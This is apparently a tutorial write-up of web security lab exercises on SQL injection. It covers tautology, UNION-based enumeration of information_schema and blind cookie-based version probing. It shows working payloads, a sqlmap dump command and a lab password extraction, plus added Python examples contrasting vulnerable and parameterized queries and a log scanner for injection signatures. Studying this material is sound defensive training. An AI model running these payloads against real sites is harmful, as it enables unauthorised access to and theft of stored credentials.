Web Security Under-the-hoods

A walk-through of basic web app vulnerabilities. I hope you find it beneficial.

SQL Injection

The hypothesis: the app executes the SQL query below after a user types input and presses Enter.

SELECT email from users WHERE username = 'user_input'

We suspect this because when the input is jeremy, jeremy's email is displayed. Try the payload below.

jeremy' or 1=1#

The payload works because the modified SQL query executed by the app becomes:

SELECT email from users WHERE username = 'jeremy' or 1=1#

As a result the app displays every row in the table. 1=1 always evaluates to the boolean value True, so if the app iterates over the result set in a loop, every row satisfies the condition and every row is displayed. The payload still works with a username that doesn't exist in the database (fake_user), because the OR operator only needs one side, either username = 'fake_user' or 1=1, to be true; with AND both sides would have to be true. That is why we use OR and not AND. But what does the ' do in the payload? It closes the string literal that the app opened. If the ' doesn't come right after jeremy, the modified SQL query looks like the one below, and the whole payload is compared as a literal username, so it yields no result.

SELECT email from users WHERE username = 'jeremy or 1=1#'

Union Based SQL Injection

UNION-based injection is used when we want to look at, or exfiltrate, additional juicy information from the database by querying other tables. Let's say you have a valid username jeremy and want his password; you would guess it is stored in some other table. There is one constraint, however: a UNION can ONLY SELECT the same number of columns as the original SQL query. Take for example the query SELECT email from users WHERE username = 'user_input'. Let's make a hypothesis first.

First hypothesis: the query selects only one column, email. To test this, we use jeremy' union select null#

Second hypothesis: the original query selects multiple columns. To test this, we add one null at a time until we find the right number of columns. Use the payloads jeremy' union select null,null# and jeremy' union select null,null,null#. The last payload returns output, which confirms that the original query selects three columns.

information_schema is a default database in the database server that stores the system's metadata: tables, columns, and other objects stored in the system. Think of it as the brain of the system, the way our human brain stores everything we know.

Given that the UNION needs three columns, we can modify the previous payload to pull information from the information_schema database instead. This is useful when we want other information such as passwords.

jeremy' UNION SELECT null,null,schema_name FROM information_schema.schemata#

Let me break it down. schema_name is a column, and we are querying it from the schemata table that resides in the information_schema database. So this payload shows you the available databases by displaying their names.

Once the databases are identified, the next two payloads list the column names and the table names:

jeremy' UNION SELECT null,null,column_name FROM information_schema.columns#
jeremy' UNION SELECT null,null,table_name FROM information_schema.tables#

From the payload that lists all the columns, we can see there is a column named password. Now use the payload below to list the password column of the table associated with this challenge, injection0x01.

jeremy' UNION SELECT null,null,password FROM injection0x01#
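The three points above (the closing quote, the column count and the UNION pulling rows from another table) can be reproduced offline. This is an added example, not code from the lab or the original post: it builds a throwaway SQLite database with constructed tables and rows, runs the walkthrough's payloads through a lookup that splices input into the SQL text, and then through the parameterized version that is the actual fix. The only adaptation is the comment marker: the lab's MySQL uses # to discard the rest of the line, SQLite uses --. Table and column names beyond users and injection0x01 are assumptions.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory schema loosely mirroring the walkthrough (assumption:
    the lab's real schema is not on the page, so these rows are illustrative)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (username TEXT, email TEXT, role TEXT);
        CREATE TABLE injection0x01 (id INTEGER, password TEXT, created TEXT);
        INSERT INTO users VALUES ('jeremy', 'jeremy@example.test', 'user');
        INSERT INTO users VALUES ('alice',  'alice@example.test',  'user');
        INSERT INTO users VALUES ('bob',    'bob@example.test',    'admin');
        INSERT INTO injection0x01 VALUES (1, 'constructed-secret-1', '2024-01-01');
        INSERT INTO injection0x01 VALUES (2, 'constructed-secret-2', '2024-01-02');
        """
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_input: str) -> list:
    """The pattern the walkthrough hypothesizes: user input is pasted into the
    SQL text, so a quote in the input ends the literal and the rest is SQL."""
    query = f"SELECT username, email, role FROM users WHERE username = '{user_input}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_input: str) -> list:
    """Parameterized query: the driver passes the value separately from the SQL
    text, so ' or 1=1-- is just a (non-existent) username, never a condition."""
    query = "SELECT username, email, role FROM users WHERE username = ?"
    return conn.execute(query, (user_input,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    # Closing quote present: the tautology returns every row in users.
    print(lookup_vulnerable(db, "jeremy' or 1=1--"))
    # Closing quote missing: the whole payload is one literal username, no rows.
    print(lookup_vulnerable(db, "jeremy or 1=1--"))
    # Three-column UNION: rows from injection0x01 ride along in the third column.
    print(lookup_vulnerable(db, "jeremy' UNION SELECT null,null,password FROM injection0x01--"))
    # Same payloads against the parameterized lookup return nothing.
    print(lookup_safe(db, "jeremy' or 1=1--"))
```

The parameterized version is the fix the walkthrough implies: the column-count guessing, the information_schema enumeration and the password dump all depend on the input being concatenated into the query text, and none of them work once the value travels as a bound parameter.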

Blind SQL Injection

Blind SQL injection is where the payload doesn't yield any displayed result. Success can only be determined by analyzing the server's response in Burp Suite. In a SQL injection attack we constantly have to ask how each thing sent to the server, credentials and cookies for example, is processed. One instance of the attack is tampering with the cookie parameter to learn the DBMS version. The version itself is never printed on the web page; instead a successful response from the server confirms it.

For this lab, we are given a set of valid credentials to log in.

  1. Login with the creds

  2. Open the POST request (the one that sends the creds to the server). The server supplies the session cookie in its response to the POST request.

  3. Open the GET request right after the POST request. It carries the cookie parameter that can be tampered with for the SQL injection attack.

  4. Copy it to Repeater and play with the cookie parameter. See walkthrough below.

Now let's try some basic injection payloads

' and 1=1# and ' or 1=1# both work. The AND operator requires both sides (the cookie check and 1=1) to be true, whereas the OR operator requires only one side to be true, so even an invalid cookie evaluates as true and the attack succeeds.

But what do we get from this attack? hahaha. We are already logged in with jeremy's credentials. In the UNION-based attack we could make the web page list all the tables and so on. In this lab, though, the ' or 1=1# payload only confirms that the cookie parameter is a valid door for SQL injection, so further attacks can be built on it to retrieve more information. The theory is to use a more intricate payload and judge success from the response. When you are logged in, the response carries Content-Length: 1027. So if the payload you inserted succeeds, you get the same Content-Length.

Now we want to use substring in the payload, and we will use it to find the exact DBMS version. The basic usage of the payload is as below.

' or substring('test',1,1) = 't'#

To know the version of the DBMS, use below payload

' or substring((version()),1,1) = '8'#

The payload above tests whether the DBMS version starts with 8. If it does, the response has Content-Length: 1027. Forward the request in Repeater to see for yourself. After refining the payload one character at a time, the final payload is as below.

' or substring((version()),1,5) = '8.0.3'#

We can use sqlmap to do an automated attack.

  1. Copy the GET request that contains the Cookie parameter and save to req.txt

  2. Use the command sqlmap -r req.txt --level=2 --dump; level 2 makes sqlmap test the Cookie header as an injection point.
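From the defender's side, the cookie and query-string tampering described in this section leaves a recognizable trail in web server logs. The block below is an added example, not part of the lab or the original post: it scans a few constructed access-log lines (the log format, the IPs, the session values and the lengths are all made up here), URL-decodes every query parameter and cookie, and tags values that carry the payload shapes shown on this page. Signature matching of this kind is a detection aid for spotting probing, not a substitute for parameterized queries.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Payload shapes taken from this walkthrough. Each tag names what the value
# looks like, not what it achieved; the fix is still a parameterized query.
SIGNATURES = {
    "tautology": re.compile(r"'\s*(or|and)\s+\d+\s*=\s*\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "blind_probe": re.compile(r"\b(substring|substr)\s*\(|\bversion\s*\(\s*\)", re.I),
    "comment_tail": re.compile(r"(#|--|/\*)\s*$"),
}

# Constructed log format (assumption, not a real server's format):
#   <ip> <method> <path> "<Cookie header>" <status> <content-length>
LOG_LINE = re.compile(r'(\S+) (\S+) (\S+) "([^"]*)" (\d{3}) (\d+)$')


def extract_values(path: str, cookie_header: str):
    """Yield (location, decoded value) for every query parameter and cookie."""
    parts = urlsplit(path)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        yield f"query:{name}", value
    for piece in cookie_header.split(";"):
        if "=" in piece:
            name, value = piece.split("=", 1)
            yield f"cookie:{name.strip()}", unquote(value.strip())


def classify(value: str) -> list:
    """Return the sorted list of signature tags that match a decoded value."""
    return sorted(tag for tag, rx in SIGNATURES.items() if rx.search(value))


def scan_log(lines: list) -> list:
    """Return [(line_no, location, tags)] for every request carrying a signature."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the constructed format; skip rather than guess
        _ip, _method, path, cookie, _status, _length = m.groups()
        for loc, value in extract_values(path, cookie):
            tags = classify(value)
            if tags:
                hits.append((n, loc, tags))
    return hits


# Constructed sample lines: a normal lookup, the tautology and UNION payloads
# from this page in the query string, the blind version() probe in the cookie,
# and a legitimate apostrophe (o'brien) that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 GET /search?username=jeremy "session=abc123" 200 1027',
    '10.0.0.5 GET /search?username=jeremy%27+or+1%3D1%23 "session=abc123" 200 4810',
    '10.0.0.5 GET /search?username=jeremy%27+UNION+SELECT+null%2Cnull%2Cschema_name'
    '+FROM+information_schema.schemata%23 "session=abc123" 200 2200',
    '10.0.0.7 GET /profile "session=%27%20or%20substring((version()),1,1)%20%3D%20%278%27%23" 200 1027',
    "10.0.0.9 GET /search?username=o%27brien \"session=zzz\" 200 980",
]

if __name__ == "__main__":
    for line_no, location, tags in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {location} -> {', '.join(tags)}")
```

Two design points: decoding happens before matching, because the quote and the # arrive as %27 and %23 in a query string, and a lone apostrophe is deliberately not a signal on its own, otherwise every O'Brien in the user base becomes an alert. The blind probe in the cookie is the interesting hit: nothing about the 200 status or the repeated Content-Length: 1027 distinguishes it from a normal logged-in request, which is exactly why this section relies on the cookie value itself.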

Challenge

Retrieve the admin's credentials from this simple system.

Let's see how many columns the union-based payload needs in order to work. After trying with fewer nulls, this is the payload that finally returns something:

tanjyoubi sushi rack' union select null,null,null,null#

So the payload above is the one that returns anything, meaning the query needs four columns in order to work.

tanjyoubi sushi rack' union select null,null,null,version()#

We can use the above payload to extract the DBMS version which is 8.0.42

Below payload is to display available databases. Database peh-labs would be of interest to us

tanjyoubi sushi rack' union select null,null,null,schema_name from information_schema.schemata#

The payload below displays the tables available in the peh-labs database. Two tables, injection0x03_users and injection0x03_products, are of interest to us, so let's investigate the injection0x03_users table.

tanjyoubi sushi rack' union select null,null,null,table_name from information_schema.tables where table_schema = 'peh-labs'#

The payload below lists the columns available in the injection0x03_users table. It displays the username and password columns.

tanjyoubi sushi rack' union select null,null,null,column_name from information_schema.columns where table_name = 'injection0x03_users'#

Next, list all usernames in the username column. Takeshi may be the admin.

tanjyoubi sushi rack' union select null,null,null,username from injection0x03_users#

The payload below lists the password column. Takeshi's password is onigirigadaisuki.

tanjyoubi sushi rack' union select null,null,null,password from injection0x03_users#
